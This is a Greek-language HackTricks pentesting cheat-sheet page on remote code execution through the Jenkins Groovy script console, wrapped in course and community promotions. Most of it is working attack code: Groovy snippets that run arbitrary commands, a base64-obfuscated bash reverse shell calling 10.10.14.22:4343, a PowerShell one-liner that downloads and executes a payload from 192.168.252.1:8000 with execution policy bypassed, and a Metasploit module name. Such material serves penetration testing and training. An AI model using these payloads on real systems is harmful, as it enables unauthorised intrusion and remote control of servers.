Jenkins RCE με Groovy Script

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

• Δείτε τα subscription plans!
• Εγγραφείτε στο 💬 Discord group ή την telegram group ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
• Μοιραστείτε τα hacking tricks υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

Jenkins RCE με Groovy Script

Αυτό είναι λιγότερο θορυβώδες από το να δημιουργήσεις ένα νέο έργο στο Jenkins

1. Πήγαινε στο path_jenkins/script
2. Μέσα στο πλαίσιο κειμένου εισάγεις το σενάριο

def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"

Μπορείτε να εκτελέσετε μια εντολή χρησιμοποιώντας: cmd.exe /c dir

Στο linux μπορείτε να κάνετε: "ls /".execute().text

Αν χρειαστεί να χρησιμοποιήσετε εισαγωγικά και μονά εισαγωγικά μέσα στο κείμενο. Μπορείτε να χρησιμοποιήσετε “”“PAYLOAD”“” (τριπλά διπλά εισαγωγικά) για να εκτελέσετε το payload.

Ένα άλλο χρήσιμο groovy script είναι (αντικαταστήστε [INSERT COMMAND]):

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Αντίστροφη θήκη σε linux

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Reverse shell in windows

Μπορείτε να προετοιμάσετε έναν HTTP server με ένα PS reverse shell και να χρησιμοποιήσετε το Jeking για να το κατεβάσετε και να το εκτελέσετε:

scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>

Script

Μπορείτε να αυτοματοποιήσετε αυτή τη διαδικασία με αυτό το σενάριο.

Μπορείτε να χρησιμοποιήσετε το MSF για να αποκτήσετε ένα reverse shell:

msf> use exploit/multi/http/jenkins_script_console

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

• Δείτε τα subscription plans!
• Εγγραφείτε στο 💬 Discord group ή την telegram group ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
• Μοιραστείτε τα hacking tricks υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.